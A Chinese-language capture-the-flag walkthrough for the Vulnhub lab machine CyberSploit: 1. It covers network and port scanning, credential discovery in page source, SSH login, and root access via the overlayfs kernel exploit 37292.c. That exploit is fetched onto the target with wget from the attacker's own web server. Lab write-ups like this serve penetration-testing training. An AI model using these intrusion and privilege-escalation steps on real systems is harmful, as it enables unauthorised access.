1. 程式人生 > 實用技巧 >靶機滲透測試(CyberSploit: 1)

靶機滲透測試(CyberSploit: 1)

靶機滲透測試(CyberSploit: 1):

Vulnhub靶機 CyberSploit: 1
靶機:修改靶機的網路配置為橋接模式。
攻擊機:Kali虛擬機器,同樣使用橋接模式,即可訪問靶機。
靶機難度:(Easy–Intermediate
目標:拿下三個flag.txt

在這裡插入圖片描述在這裡插入圖片描述



滲透流程:

1. 探測靶機ip地址(netdiscover -i eth0 -r 閘道器)

終端命令: netdiscover -i eth0 -r 192.168.10.0(閘道器)
得到靶機ip:192.168.10.70
在這裡插入圖片描述



2. nmap進行靶機埠服務掃描

終端命令:nmap -sS -Pn -A -p- -n 192.168.10.70 (靶機ip)

目標靶機開放 22/tcp–ssh, 80/tcp --http埠服務;

在這裡插入圖片描述



3. 根據埠服務進行滲透(80/tcp–http埠服務)

3.1. 登入web頁面

登入web頁面,80埠,進行靶機滲透第一步:資訊收集;

在這裡插入圖片描述
3.2. 資訊收集

首先發現web頁面存在四個超連結,但是url均設定為#,不允許跳轉。故先ctrl+u,檢視一波原始碼,在原始碼最後部分,看到一組使用者名稱:----username: itsskv------
(猜想為ssh登入使用者名稱)

在這裡插入圖片描述
3.3. 目錄掃描

使用kali中的dirb工具進行web目錄掃描,(也可以使用御劍工具),看到敏感目錄檔案:/robots /robots.txt ;


終端命令:dirb http://192.168.10.70:80

在這裡插入圖片描述
跳轉到/robots頁面,可以看到一組程式碼,為base64加密;

在這裡插入圖片描述

進入base64線上加解密網站,進行base64解密;
Flag1:cybersploit{youtube.com/c/cybersploit}

flag1中存在一組程式碼,猜想可能為ssh登陸的密碼;
base64加解密

在這裡插入圖片描述



4. ssh連線靶機(22/tcp–ssh埠服務)

4.1. ssh登陸

終端命令: ssh [email protected]
ssh 使用者名稱@靶機ip
ssh登陸後,輸入flag1中base64解碼後的密碼,>登陸成功

在這裡插入圖片描述
4.2. 普通使用者許可權

得到itsskv使用者許可權,ls展開當前目錄,發現flag2.txt,發現為二進位制程式碼,直接複製貼上輸出為字串格式;

線上工具:字元轉換工具

在這裡插入圖片描述
得到flag2!!! flag2: cybersploit{https:t.me/cybersploit1}
在這裡插入圖片描述



5. 提權:

5.1. 使用者提權

利用exp核心提權,首先命令uname -a 檢視核心版本;
發現是3.13.0,嘗試利用overlayfs提權;
命令:searchspolit overlayfs,得到核心漏洞指令碼;

下載37292.c檔案,然後move移動到/var/www/html目錄下
下載命令: cp /usr.share/exploitdb/exploits/linux/local/37292.c /root
移動命令: mv /root/37292.c /var/www/html

在這裡插入圖片描述
下載exp檔案到靶機機器內

命令: python SimpleHTTPServer 8080(講解如下,目的:開啟web伺服器)
wget http://192.168.10.8(kali攻擊機的ip):8080/37292.c


啟動一個簡單的 web 伺服器:

python -m SimpleHTTPServer 8080
or
python3 -m http.server 8080


在這裡插入圖片描述
gcc編譯命令: gcc 37292.c -o test
執行指令碼檔案: ./test
提權成功,得到root許可權!!!

在這裡插入圖片描述
進入/root目錄,得到 finalflag.txt !!! 實驗成功!!!

在這裡插入圖片描述



實驗總結:

此次靶機難度不大,首先測試我們的資訊收集能力,學會從原始碼分析,此次實驗中直接從原始碼得到ssh登陸賬戶,robots為機器人協議,為web敏感目錄,robots.txt檔案(也稱為漫遊器排除協議或標準)是一個文字檔案,用於告訴搜尋引擎爬蟲能抓取網站上的哪些頁面,不能抓取哪些頁面。

以及學會使用工具進行二進位制與字串之間的轉換,當然也可以自己編寫指令碼,最後提權部分使用exp核心提權,開啟簡單web伺服器是本次實驗亮點;